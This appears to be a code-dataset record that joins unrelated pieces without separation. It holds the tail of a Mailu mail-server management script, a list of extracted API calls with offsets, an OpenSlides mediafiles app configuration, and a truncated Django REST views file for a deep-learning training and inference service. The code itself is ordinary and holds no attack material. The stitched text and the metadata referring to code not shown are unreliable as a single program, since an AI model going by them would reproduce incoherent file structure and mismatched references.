users=new_config['users']
tracked_users=set()
for user_config in users:
localpart=user_config['localpart']
domain_name=user_config['domain']
password_hash=user_config['password_hash']
hash_scheme=user_config['hash_scheme']
domain = models.Domain.query.get(domain_name)
email='{0}@{1}'.format(localpart,domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
user = models.User.query.get(email)
tracked_users.add(email)
if not user:
user = models.User(
localpart=localpart,
domain=domain,
global_admin=False
)
user.set_password(password_hash, hash_scheme=hash_scheme, raw=True)
db.session.add(user)
aliases=new_config['aliases']
tracked_aliases=set()
for alias_config in aliases:
localpart=alias_config['localpart']
domain_name=alias_config['domain']
destination=alias_config['destination']
domain = models.Domain.query.get(domain_name)
email='{0}@{1}'.format(localpart,domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
alias = models.Alias.query.get(email)
tracked_aliases.add(email)
if not alias:
alias = models.Alias(
localpart=localpart,
domain=domain,
destination=destination.split(','),
email=email
)
else:
alias.destination = destination.split(',')
db.session.add(alias)
if delete_objects:
for user in db.session.query(models.User).all():
if not ( user.email in tracked_users ):
db.session.delete(user)
for alias in db.session.query(models.Alias).all():
if not ( alias.email in tracked_aliases ):
db.session.delete(alias)
db.session.commit()
@manager.command
def user_delete(email):
"""delete user"""
user = models.User.query.get(email)
if user:
db.session.delete(user)
db.session.commit()
@manager.command
def alias_delete(email):
"""delete alias"""
alias = models.Alias.query.get(email)
if alias:
db.session.delete(alias)
db.session.commit()
@manager.command
def alias(localpart, domain_name, destination):
""" Create an alias
"""
domain = models.Domain.query.get(domain_name)
if not domain:
domain = models.Domain(name=domain_name)
db.session.add(domain)
alias = models.Alias(
localpart=localpart,
domain=domain,
destination=destination.split(','),
email="%s@%s" % (localpart, domain_name)
)
db.session.add(alias)
db.session.commit()
# Set limits to a domain
@manager.command
def setlimits(domain_name, max_users, max_aliases, max_quota_bytes):
domain = models.Domain.query.get(domain_name)
domain.max_users = max_users
domain.max_aliases = max_aliases
domain.max_quota_bytes = max_quota_bytes
db.session.add(domain)
db.session.commit()
# Make the user manager of a domain
@manager.command
def setmanager(domain_name, user_name='manager'):
domain = models.Domain.query.get(domain_name)
manageruser = models.User.query.get(user_name + '@' + domain_name)
domain.managers.append(manageruser)
db.session.add(domain)
db.session.commit()
if __name__ == "__main__":
manager.run()
| [
"mailu.admin.models.Domain",
"mailu.db.session.add",
"yaml.load",
"mailu.db.session.query",
"mailu.admin.models.Domain.query.get",
"mailu.admin.models.User.query.get",
"mailu.manager.run",
"mailu.admin.models.Alias.query.get",
"mailu.db.session.delete",
"mailu.admin.models.User",
"mailu.db.sessi... | [((180, 216), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (203, 216), False, 'from mailu.admin import models\n'), ((327, 393), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(True)'}), '(localpart=localpart, domain=domain, global_admin=True)\n', (338, 393), False, 'from mailu.admin import models\n'), ((460, 480), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (474, 480), False, 'from mailu import app, manager, db\n'), ((485, 504), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (502, 504), False, 'from mailu import app, manager, db\n'), ((654, 690), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (677, 690), False, 'from mailu.admin import models\n'), ((801, 868), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (812, 868), False, 'from mailu.admin import models\n'), ((960, 980), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (974, 980), False, 'from mailu import app, manager, db\n'), ((985, 1004), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1002, 1004), False, 'from mailu import app, manager, db\n'), ((1335, 1371), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (1358, 1371), False, 'from mailu.admin import models\n'), ((1482, 1549), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (1493, 1549), False, 'from mailu.admin import models\n'), ((1656, 1676), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (1670, 1676), False, 'from mailu import app, manager, db\n'), ((1681, 1700), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1698, 1700), False, 'from mailu import app, manager, db\n'), ((1861, 1881), 'yaml.load', 'yaml.load', (['sys.stdin'], {}), '(sys.stdin)\n', (1870, 1881), False, 'import yaml, sys\n'), ((3925, 3944), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3942, 3944), False, 'from mailu import app, manager, db\n'), ((4020, 4048), 'mailu.admin.models.User.query.get', 'models.User.query.get', (['email'], {}), '(email)\n', (4041, 4048), False, 'from mailu.admin import models\n'), ((4098, 4117), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4115, 4117), False, 'from mailu import app, manager, db\n'), ((4196, 4225), 'mailu.admin.models.Alias.query.get', 'models.Alias.query.get', (['email'], {}), '(email)\n', (4218, 4225), False, 'from mailu.admin import models\n'), ((4277, 4296), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4294, 4296), False, 'from mailu import app, manager, db\n'), ((4408, 4444), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (4431, 4444), False, 'from mailu.admin import models\n'), ((4725, 4746), 'mailu.db.session.add', 'db.session.add', (['alias'], {}), '(alias)\n', (4739, 4746), False, 'from mailu import app, manager, db\n'), ((4751, 4770), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4768, 4770), False, 'from mailu import app, manager, db\n'), ((4894, 4930), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (4917, 4930), False, 'from mailu.admin import models\n'), ((5043, 5065), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (5057, 5065), False, 'from mailu import app, manager, db\n'), ((5068, 5087), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5085, 5087), False, 'from mailu import app, manager, db\n'), ((5203, 5239), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (5226, 5239), False, 'from mailu.admin import models\n'), ((5256, 5308), 'mailu.admin.models.User.query.get', 'models.User.query.get', (["(user_name + '@' + domain_name)"], {}), "(user_name + '@' + domain_name)\n", (5277, 5308), False, 'from mailu.admin import models\n'), ((5349, 5371), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (5363, 5371), False, 'from mailu import app, manager, db\n'), ((5374, 5393), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5391, 5393), False, 'from mailu import app, manager, db\n'), ((5427, 5440), 'mailu.manager.run', 'manager.run', ([], {}), '()\n', (5438, 5440), False, 'from mailu import app, manager, db\n'), ((253, 284), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (266, 284), False, 'from mailu.admin import models\n'), ((293, 315), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (307, 315), False, 'from mailu import app, manager, db\n'), ((727, 758), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (740, 758), False, 'from mailu.admin import models\n'), ((767, 789), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (781, 789), False, 'from mailu import app, manager, db\n'), ((1408, 1439), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (1421, 1439), False, 'from mailu.admin import models\n'), ((1448, 1470), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (1462, 1470), False, 'from mailu import app, manager, db\n'), ((2189, 2225), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (2212, 2225), False, 'from mailu.admin import models\n'), ((2406, 2434), 'mailu.admin.models.User.query.get', 'models.User.query.get', (['email'], {}), '(email)\n', (2427, 2434), False, 'from mailu.admin import models\n'), ((2722, 2742), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (2736, 2742), False, 'from mailu import app, manager, db\n'), ((2989, 3025), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (3012, 3025), False, 'from mailu.admin import models\n'), ((3207, 3236), 'mailu.admin.models.Alias.query.get', 'models.Alias.query.get', (['email'], {}), '(email)\n', (3229, 3236), False, 'from mailu.admin import models\n'), ((3567, 3588), 'mailu.db.session.add', 'db.session.add', (['alias'], {}), '(alias)\n', (3581, 3588), False, 'from mailu import app, manager, db\n'), ((4070, 4093), 'mailu.db.session.delete', 'db.session.delete', (['user'], {}), '(user)\n', (4087, 4093), False, 'from mailu import app, manager, db\n'), ((4248, 4272), 'mailu.db.session.delete', 'db.session.delete', (['alias'], {}), '(alias)\n', (4265, 4272), False, 'from mailu import app, manager, db\n'), ((4481, 4512), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (4494, 4512), False, 'from mailu.admin import models\n'), ((4521, 4543), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (4535, 4543), False, 'from mailu import app, manager, db\n'), ((2324, 2355), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (2337, 2355), False, 'from mailu.admin import models\n'), ((2368, 2390), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (2382, 2390), False, 'from mailu import app, manager, db\n'), ((2508, 2575), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (2519, 2575), False, 'from mailu.admin import models\n'), ((3124, 3155), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (3137, 3155), False, 'from mailu.admin import models\n'), ((3168, 3190), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (3182, 3190), False, 'from mailu import app, manager, db\n'), ((3637, 3666), 'mailu.db.session.query', 'db.session.query', (['models.User'], {}), '(models.User)\n', (3653, 3666), False, 'from mailu import app, manager, db\n'), ((3742, 3765), 'mailu.db.session.delete', 'db.session.delete', (['user'], {}), '(user)\n', (3759, 3765), False, 'from mailu import app, manager, db\n'), ((3787, 3817), 'mailu.db.session.query', 'db.session.query', (['models.Alias'], {}), '(models.Alias)\n', (3803, 3817), False, 'from mailu import app, manager, db\n'), ((3896, 3920), 'mailu.db.session.delete', 'db.session.delete', (['alias'], {}), '(alias)\n', (3913, 3920), False, 'from mailu import app, manager, db\n')] |
from typing import Any, Dict, Set
from django.apps import AppConfig
class MediafilesAppConfig(AppConfig):
name = "openslides.mediafiles"
verbose_name = "OpenSlides Mediafiles"
angular_site_module = True
def ready(self):
# Import all required stuff.
from openslides.core.signals import permission_change
from openslides.utils.rest_api import router
from .projector import register_projector_elements
from .signals import get_permission_change_data
from .views import MediafileViewSet
from . import serializers # noqa
from ..utils.access_permissions import required_user
# Define projector elements.
register_projector_elements()
# Connect signals.
permission_change.connect(
get_permission_change_data,
dispatch_uid="mediafiles_get_permission_change_data",
)
# Register viewsets.
router.register(
self.get_model("Mediafile").get_collection_string(), MediafileViewSet
)
# register required_users
required_user.add_collection_string(
self.get_model("Mediafile").get_collection_string(), required_users
)
def get_startup_elements(self):
"""
Yields all Cachables required on startup i. e. opening the websocket
connection.
"""
yield self.get_model("Mediafile")
def required_users(element: Dict[str, Any]) -> Set[int]:
"""
Returns all user ids that are displayed as uploaders in any mediafile
if request_user can see mediafiles. This function may return an empty
set.
"""
return set(element["uploader_id"])
| [
"openslides.core.signals.permission_change.connect"
] | [((766, 878), 'openslides.core.signals.permission_change.connect', 'permission_change.connect', (['get_permission_change_data'], {'dispatch_uid': '"""mediafiles_get_permission_change_data"""'}), "(get_permission_change_data, dispatch_uid=\n 'mediafiles_get_permission_change_data')\n", (791, 878), False, 'from openslides.core.signals import permission_change\n')] |
import datetime
import os
import uuid
from os.path import join as opjoin
from pathlib import Path
import numpy as np
import requests
import yaml
from celery.result import AsyncResult
from django.db.models import Q
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import mixins, status, views, viewsets
from rest_framework.response import Response
from backend import celery_app, settings
from backend_app import mixins as BAMixins, models, serializers, swagger
from backend_app import utils
from deeplearning.tasks import classification, segmentation
from deeplearning.utils import nn_settings
class AllowedPropViewSet(BAMixins.ParamListModelMixin,
mixins.CreateModelMixin,
viewsets.GenericViewSet):
queryset = models.AllowedProperty.objects.all()
serializer_class = serializers.AllowedPropertySerializer
params = ['model_id', 'property_id']
def get_queryset(self):
model_id = self.request.query_params.get('model_id')
property_id = self.request.query_params.get('property_id')
self.queryset = models.AllowedProperty.objects.filter(model_id=model_id, property_id=property_id)
return self.queryset
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('model_id', openapi.IN_QUERY, "Integer representing a model",
required=True, type=openapi.TYPE_INTEGER),
openapi.Parameter('property_id', openapi.IN_QUERY, "Integer representing a property",
required=True, type=openapi.TYPE_INTEGER)]
)
def list(self, request, *args, **kwargs):
"""Return the allowed and default values of a property
This method returns the values that a property can assume depending on the model employed. \
It provides a default value and a comma separated list of values to choose from.
When this api returns an empty list, the property allowed values and default should be retrieved \
using the `/properties/{id}` API.
"""
return super().list(request, *args, **kwargs)
def create(self, request, *args, **kwargs):
"""Create a new AllowedProperty
This method create a new AllowedProperty
"""
return super().create(request, *args, **kwargs)
class DatasetViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
viewsets.GenericViewSet):
queryset = models.Dataset.objects.filter(is_single_image=False)
serializer_class = serializers.DatasetSerializer
def get_queryset(self):
task_id = self.request.query_params.get('task_id')
if task_id:
self.queryset = models.Dataset.objects.filter(task_id=task_id, is_single_image=False)
# self.queryset = models.Dataset.objects.filter(task_id=task_id)
return self.queryset
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('task_id', openapi.IN_QUERY, type=openapi.TYPE_INTEGER, required=False)]
)
def list(self, request, *args, **kwargs):
"""Get the list datasets to use for training or finetuning
This method returns all the datasets in the backend.
"""
return super().list(request, *args, **kwargs)
def retrieve(self, request, *args, **kwargs):
"""Retrieve a single dataset
This method returns the `{id}` dataset.
"""
return super().retrieve(request, *args, **kwargs)
@swagger_auto_schema(responses=swagger.DatasetViewSet_create_response)
def create(self, request, *args, **kwargs):
"""Upload a new dataset downloading it from a URL
This API uploads a dataset YAML file and stores it in the backend.
The `path` field must contain the URL of a dataset, e.g. \
[`dropbox.com/s/ul1yc8owj0hxpu6/isic_segmentation.yml`](https://www.dropbox.com/s/ul1yc8owj0hxpu6/isic_segmentation.yml?dl=1).
"""
serializer = self.get_serializer(data=request.data)
if not serializer.is_valid():
return Response({'error': 'Validation error. Request data is malformed.'},
status=status.HTTP_400_BAD_REQUEST)
# Download the yml file in url
url = serializer.validated_data['path']
dataset_name = serializer.validated_data['name']
dataset_out_path = f'{settings.DATASETS_DIR}/{dataset_name}.yml'
if Path(f'{settings.DATASETS_DIR}/{dataset_name}.yml').exists():
return Response({'error': f'The dataset `{dataset_name}` already exists'},
status=status.HTTP_400_BAD_REQUEST)
try:
r = requests.get(url, allow_redirects=True)
if r.status_code == 200:
yaml_content = yaml.load(r.content, Loader=yaml.FullLoader)
with open(f'{settings.DATASETS_DIR}/{dataset_name}.yml', 'w') as f:
yaml.dump(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)
# Update the path
serializer.save(path=dataset_out_path)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
except requests.exceptions.RequestException:
# URL malformed
return Response({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)
return Response({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)
class InferenceViewSet(views.APIView):
@swagger_auto_schema(request_body=serializers.InferenceSerializer,
responses=swagger.inferences_post_responses)
def post(self, request):
"""Start an inference process using a pre-trained model on a dataset
This is the main entry point to start the inference. \
It is mandatory to specify a pre-trained model and a dataset.
"""
serializer = serializers.InferenceSerializer(data=request.data)
if serializer.is_valid():
return utils.do_inference(serializer)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class InferenceSingleViewSet(views.APIView):
@swagger_auto_schema(request_body=serializers.InferenceSingleSerializer,
responses=swagger.inferences_post_responses)
def post(self, request):
"""Starts the inference providing an image URL
This API allows the inference of a single image.
It is mandatory to specify the same fields of `/inference` API, but for dataset_id which is replaced by \
the url of the image to process.
"""
serializer = serializers.InferenceSingleSerializer(data=request.data)
if serializer.is_valid():
image_url = serializer.validated_data['image_url']
project_id = serializer.validated_data['project_id']
task_id = models.Project.objects.get(id=project_id).task_id
# Create a dataset with the single image to process
dummy_dataset = f'name: "{image_url}"\n' \
f'description: "{image_url} auto-generated dataset"\n' \
f'images: ["{image_url}"]\n' \
f'split:\n' \
f' test: [0]'
# Save dataset and get id
d = models.Dataset(name=f'single-image-dataset', task_id=task_id, path='', is_single_image=True)
d.save()
try:
yaml_content = yaml.load(dummy_dataset, Loader=yaml.FullLoader)
except yaml.YAMLError as e:
d.delete()
print(e)
return Response({'error': 'Error in YAML parsing'}, status=status.HTTP_400_BAD_REQUEST)
with open(f'{settings.DATASETS_DIR}/single_image_dataset_{d.id}.yml', 'w') as f:
yaml.dump(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)
# Update the path
d.path = f'{settings.DATASETS_DIR}/single_image_dataset_{d.id}.yml'
d.save()
serializer.validated_data['dataset_id'] = d
return utils.do_inference(serializer)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ModelViewSet(mixins.ListModelMixin,
viewsets.GenericViewSet):
queryset = models.Model.objects.all()
serializer_class = serializers.ModelSerializer
def get_queryset(self):
task_id = self.request.query_params.get('task_id')
if task_id:
self.queryset = models.Model.objects.filter(task_id=task_id)
return self.queryset
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('task_id', openapi.IN_QUERY,
"Integer for filtering the models based on task.",
type=openapi.TYPE_INTEGER, required=False)]
)
def list(self, request):
"""Returns the available Neural Network models
This API allows the client to know which Neural Network models are available in the system in order to allow \
their selection.
The optional `task_id` parameter is used to filter them based on the task the models are used for.
"""
return super().list(request)
class ModelWeightsViewSet(BAMixins.ParamListModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
queryset = models.ModelWeights.objects.all()
serializer_class = serializers.ModelWeightsSerializer
params = ['model_id']
def get_queryset(self):
if self.action == 'list':
model_id = self.request.query_params.get('model_id')
self.queryset = models.ModelWeights.objects.filter(model_id=model_id)
return self.queryset
else:
return super(ModelWeightsViewSet, self).get_queryset()
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('model_id', openapi.IN_QUERY,
"Return the modelweights obtained on `model_id` model.",
type=openapi.TYPE_INTEGER, required=False)]
)
def list(self, request):
"""Returns the available Neural Network models
When 'use pre-trained' is selected, it is possible to query the backend passing a `model_id` to obtain a list
of dataset on which it was pretrained.
"""
return super().list(request)
def retrieve(self, request, *args, **kwargs):
"""Retrieve a single modelweight
This API returns the modelweight with the requested`{id}`.
"""
return super().retrieve(request, *args, **kwargs)
def get_obj(self, id):
try:
return models.ModelWeights.objects.get(id=id)
except models.ModelWeights.DoesNotExist:
return None
def put(self, request, *args, **kwargs):
"""Update an existing weight
This method updates an existing model weight (e.g. change the name).
"""
weight = self.get_obj(request.data['id'])
if not weight:
error = {"Error": f"Weight {request.data['id']} does not exist"}
return Response(data=error, status=status.HTTP_400_BAD_REQUEST)
serializer = self.serializer_class(weight, data=request.data)
if serializer.is_valid():
serializer.save()
# Returns all the elements with model_id in request
queryset = models.ModelWeights.objects.filter(model_id=weight.model_id)
serializer = self.get_serializer(queryset, many=True)
# serializer = self.serializer_class(queryset, many=True)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
"""Update an existing weight
This method updates an existing model weight (e.g. change the name).
"""
return super().update(request, *args, **kwargs)
@swagger_auto_schema(auto_schema=None)
def partial_update(self, request, *args, **kwargs):
return super().partial_update(request, *args, **kwargs)
class OutputViewSet(views.APIView):
@staticmethod
def trunc(values, decs=0):
return np.trunc(values * 10 ** decs) / (10 ** decs)
@swagger_auto_schema(
manual_parameters=[openapi.Parameter('process_id', openapi.IN_QUERY,
"Pass a required UUID representing a finished process.",
type=openapi.TYPE_STRING, format=openapi.FORMAT_UUID, required=False)],
responses=swagger.OutputViewSet_get_responses
)
def get(self, request, *args, **kwargs):
"""Retrieve results about an inference process
This API provides information about an `inference` process.In classification task it returns the list \
of images and an array composed of the classes prediction scores.
In segmentation task it returns the URLs of the segmented images.
"""
if not self.request.query_params.get('process_id'):
error = {'Error': f'Missing required parameter `process_id`'}
return Response(data=error, status=status.HTTP_400_BAD_REQUEST)
process_id = self.request.query_params.get('process_id')
infer = models.Inference.objects.filter(celery_id=process_id)
if not infer:
# already deleted weight/training or inference
return Response({"result": "Process stopped before finishing or non existing."},
status=status.HTTP_404_NOT_FOUND)
if AsyncResult(process_id).status == 'PENDING':
return Response({"result": "Process in execution. Try later for output results."},
status=status.HTTP_200_OK)
infer = infer.first()
if not os.path.exists(opjoin(settings.OUTPUTS_DIR, infer.outputfile)):
return Response({"result": "Output file not found"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
outputs = open(opjoin(settings.OUTPUTS_DIR, infer.outputfile), 'r')
# Differentiate classification and segmentation
if infer.modelweights_id.model_id.task_id.name.lower() == 'classification':
lines = outputs.read().splitlines()
lines = [line.split(';') for line in lines]
# preds = self.trunc(preds, decs=8)
else:
# Segmentation
# output file contains path of files
uri = request.build_absolute_uri(settings.MEDIA_URL)
lines = outputs.read().splitlines()
lines = [l.replace(settings.OUTPUTS_DIR, uri) for l in lines]
response = {'outputs': lines}
return Response(response, status=status.HTTP_200_OK)
class ProjectViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
queryset = models.Project.objects.all()
serializer_class = serializers.ProjectSerializer
def get_obj(self, id):
try:
return models.Project.objects.get(id=id)
except models.Project.DoesNotExist:
return None
def list(self, request, *args, **kwargs):
"""Loads all the projects
This method lists all the available projects.
"""
return super().list(request, *args, **kwargs)
def retrieve(self, request, *args, **kwargs):
"""Retrieve a single project
Returns a project by `{id}`.
"""
return super().retrieve(request, *args, **kwargs)
@swagger_auto_schema(responses=swagger.ProjectViewSet_create_response)
def create(self, request, *args, **kwargs):
"""Create a new project
Create a new project.
"""
return super().create(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
project = self.get_obj(request.data['id'])
if not project:
error = {"Error": f"Project {request.data['id']} does not exist"}
return Response(data=error, status=status.HTTP_400_BAD_REQUEST)
serializer = serializers.ProjectSerializer(project, data=request.data)
if serializer.is_valid():
serializer.save()
# Returns all the elements
return self.list(request)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
"""Update an existing project
Update a project instance by providing its `{id}`.
"""
return super().update(request, *args, **kwargs)
@swagger_auto_schema(auto_schema=None)
def partial_update(self, request, *args, **kwargs):
return super().partial_update(request, *args, **kwargs)
class PropertyViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
viewsets.GenericViewSet):
queryset = models.Property.objects.all()
serializer_class = serializers.PropertyListSerializer
def get_queryset(self):
name = self.request.query_params.get('name')
# Substitute underscore with space if present
if name:
name = [name, name.replace('_', ' ')]
self.queryset = models.Property.objects.filter(Q(name__icontains=name[0]) | Q(name__icontains=name[1]))
return self.queryset
def list(self, request, *args, **kwargs):
"""Return the Properties supported by backend
This API allows the client to know which properties are "globally" supported by the backend.
A model can have different default value and allowed values if the `/allowedProperties` return an entry.
"""
return super().list(request, *args, **kwargs)
def retrieve(self, request, *args, **kwargs):
"""Retrieve a single property
Return a property by `{id}`.
"""
return super().retrieve(request, *args, **kwargs)
class StatusView(views.APIView):
@swagger_auto_schema(manual_parameters=[openapi.Parameter('process_id', openapi.IN_QUERY,
"UUID representing a process",
required=True, type=openapi.TYPE_STRING,
format=openapi.FORMAT_UUID)],
responses=swagger.StatusView_get_response
)
def get(self, request):
"""Return the status of an training or inference process
This API allows the frontend to query the status of a training or inference, identified by a `process_id` \
(which is returned by `/train` or `/inference` APIs).
"""
if not self.request.query_params.get('process_id'):
error = {'Error': f'Missing required parameter `process_id`'}
return Response(data=error, status=status.HTTP_400_BAD_REQUEST)
process_id = self.request.query_params.get('process_id')
if models.ModelWeights.objects.filter(celery_id=process_id).exists():
process_type = 'training'
process = models.ModelWeights.objects.filter(celery_id=process_id).first()
elif models.Inference.objects.filter(celery_id=process_id).exists():
process_type = 'inference'
process = models.Inference.objects.filter(celery_id=process_id).first()
else:
res = {
"result": "error",
"error": "Process not found."
}
return Response(data=res, status=status.HTTP_404_NOT_FOUND)
try:
with open(process.logfile, 'r') as f:
lines = f.read().splitlines()
last_line = lines[-1]
except:
res = {
"result": "error",
"error": "Log file not found"
}
return Response(data=res, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
if last_line == '<done>':
process_status = 'finished'
last_line = lines[-2]
else:
process_status = 'running'
res = {
'result': 'ok',
'status': {
'process_type': process_type,
'process_status': process_status,
'process_data': last_line,
}
}
return Response(data=res, status=status.HTTP_200_OK)
class StopProcessViewSet(views.APIView):
@swagger_auto_schema(request_body=serializers.StopProcessSerializer,
responses=swagger.StopProcessViewSet_post_response
)
def post(self, request):
"""Kill a training or inference process
Stop a training process specifying a `process_id` (which is returned by `/train` or `/inference` APIs).
"""
serializer = serializers.StopProcessSerializer(data=request.data)
if serializer.is_valid():
process_id = serializer.data['process_id']
weights = models.ModelWeights.objects.filter(celery_id=process_id)
infer = models.Inference.objects.filter(celery_id=process_id)
response = {"result": "Process stopped"}
if not weights.exists() and not infer.exists():
# already deleted weight/training or inference
return Response({"result": "Process already stopped or non existing"}, status=status.HTTP_404_NOT_FOUND)
elif weights:
weights = weights.first()
celery_id = weights.celery_id
celery_app.control.revoke(celery_id, terminate=True, signal='SIGUSR1')
response = {"result": "Training stopped"}
# delete the ModelWeights entry from db
# also delete ModelWeights fk in project
weights.delete()
elif infer:
infer = infer.first()
celery_id = infer.celery_id
celery_app.control.revoke(celery_id, terminate=True, signal='SIGUSR1')
response = {"result": "Inference stopped"}
# delete the ModelWeights entry from db
infer.delete()
# todo delete log file? delete weight file?
return Response(response, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TaskViewSet(mixins.ListModelMixin,
viewsets.GenericViewSet):
queryset = models.Task.objects.all()
serializer_class = serializers.TaskSerializer
def list(self, request, *args, **kwargs):
"""Return the tasks supported by backend
This API allows the client to know which task this platform supports. e.g. classification or segmentation tasks.
"""
return super().list(request, *args, **kwargs)
class TrainViewSet(views.APIView):
@swagger_auto_schema(request_body=serializers.TrainSerializer,
responses=swagger.TrainViewSet_post_response
)
def post(self, request):
"""Starts the training of a (possibly pre-trained) model on a dataset
This is the main entry point to start the training of a model on a dataset. \
It is mandatory to specify a model to be trained and a dataset.
When providing a `weights_id`, the training starts from the pre-trained model.
"""
serializer = serializers.TrainSerializer(data=request.data)
if serializer.is_valid():
# Create a new modelweights and start training
weight = models.ModelWeights()
weight.dataset_id_id = serializer.data['dataset_id']
weight.model_id_id = serializer.data['model_id']
if not models.Dataset.objects.filter(id=weight.dataset_id_id, is_single_image=False).exists():
error = {"Error": f"Dataset with id `{weight.dataset_id_id}` does not exist"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
if not models.Model.objects.filter(id=weight.model_id_id).exists():
error = {"Error": f"Model with id `{weight.model_id_id}` does not exist"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
if not models.Project.objects.filter(id=serializer.data['project_id']).exists():
error = {"Error": f"Project with id `{serializer.data['project_id']}` does not exist"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
# Check if dataset and model are both for same task
if weight.model_id.task_id != weight.dataset_id.task_id:
error = {"Error": f"Model and dataset must belong to the same task"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
project = models.Project.objects.get(id=serializer.data['project_id'])
task_name = project.task_id.name.lower()
weight.task_id = project.task_id
weight.name = f'{weight.model_id.name}_{weight.dataset_id.name}_' \
f'{datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")}'
if serializer.data['weights_id']:
weight.pretrained_on_id = serializer.data['weights_id']
if not models.ModelWeights.objects.filter(id=weight.pretrained_on_id).exists():
error = {"Error": f"Model weight with id `{weight.pretrained_on_id}` does not exist"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
weight.save() # Generate an id for the weight
ckpts_dir = opjoin(settings.TRAINING_DIR, 'ckpts')
weight.location = Path(opjoin(ckpts_dir, f'{weight.id}.bin')).absolute()
# Create a logfile
weight.logfile = models.generate_file_path(f'{uuid.uuid4().hex}.log', settings.TRAINING_DIR, 'logs')
weight.save()
hyperparams = {}
# Check if current model has some custom properties and load them
props_allowed = models.AllowedProperty.objects.filter(model_id=weight.model_id_id)
if props_allowed:
for p in props_allowed:
